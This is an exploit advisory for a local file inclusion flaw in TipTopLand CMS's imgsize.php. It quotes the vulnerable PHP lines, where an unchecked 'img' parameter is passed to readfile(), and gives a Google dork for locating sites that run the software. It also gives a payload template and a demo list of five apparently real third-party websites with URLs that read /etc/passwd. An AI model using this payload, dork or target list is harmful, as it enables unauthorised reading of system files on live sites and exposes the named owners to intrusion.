#######################################################
# Exploit Title : TipTopLand CMS - Local File Inclusion Vulnerability
# Date : 2020-05-08
# Exploit Author : Freedom Fighter
# Vendor Homepage : tiptopland.com
# Google Dork : intext:"TipTopLand Design Studio"
# category : Webapps
# Tested on : Google Chrome Browser
#######################################################
-- Vulnerable Page:
/imgsize.php
-- Vulnerable Source:
28: $img = $_GET['img'];
74: $im = @ImageCreateFromJPEG ($img) or // Read JPEG Image
75: $im = @ImageCreateFromPNG ($img) or // or PNG Image
76: $im = @ImageCreateFromGIF ($img) or // or GIF Image
77: $im = false; // If image is not JPEG, PNG, or GIF
79: if (!$im) {
82: readfile ($img);
-- Payload:
view-source:target/imgsize.php?img=[file]&w=0
-- DEMO:
view-source:http://pardisyazd.com/imgsize.php?img=/etc/passwd&w=0
view-source:http://www.behsarma.com/imgsize.php?img=/etc/passwd&w=0
view-source:http://www.nsmdrywall.com/imgsize.php?img=/etc/passwd&w=0
view-source:http://vistapanel.ir/imgsize.php?img=/etc/passwd&w=0
view-source:http://www.mafaco.ir/imgsize.php?img=/etc/passwd&w=0